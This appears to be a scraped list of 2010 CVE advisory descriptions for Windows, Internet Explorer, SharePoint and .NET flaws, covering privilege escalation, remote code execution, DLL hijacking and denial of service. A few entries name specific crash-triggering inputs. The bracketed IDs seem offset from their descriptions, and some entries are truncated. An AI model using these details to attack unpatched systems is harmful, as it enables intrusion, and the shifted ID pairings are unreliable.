Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to 